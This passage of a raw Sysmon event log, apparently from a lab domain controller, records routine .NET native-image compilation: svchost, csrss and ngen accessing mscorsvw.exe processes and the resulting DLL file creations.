+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:07.217{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\32c-0\System.Web.Routing.dll2021-01-18 13:48:07.217 10341000x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.186{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:07.186{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D302-00000000A301}812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.123{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.108{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:07.108{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9197-6005-D202-00000000A301}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:07.061{59A5CD1D-9196-6005-D102-00000000A301}2828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b0c-0\System.Web.RegularExpressions.dll2021-01-18 13:48:07.061 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.842{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.842{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:08.842{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:08.717{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9198-6005-D602-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:08.607{59A5CD1D-9197-6005-D502-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\328-0\System.Windows.Controls.Ribbon.dll2021-01-18 13:48:08.607 11241100x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:11.842{59A5CD1D-9198-6005-D702-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c0-0\System.Windows.Forms.DataVisualization.dll2021-01-18 13:48:11.842 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.732{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:12.717{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.717{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DE02-00000000A301}3816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.654{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1288-0\System.Windows.Presentation.dll2021-01-18 13:48:12.654 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.576{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.576{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:12.576{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DD02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.514{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.514{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-919C-6005-DC02-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:12.467{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a94-0\System.Windows.Input.Manipulations.dll2021-01-18 13:48:12.467 10341000x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.342{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:12.326{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-919C-6005-DB02-00000000A301}2708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
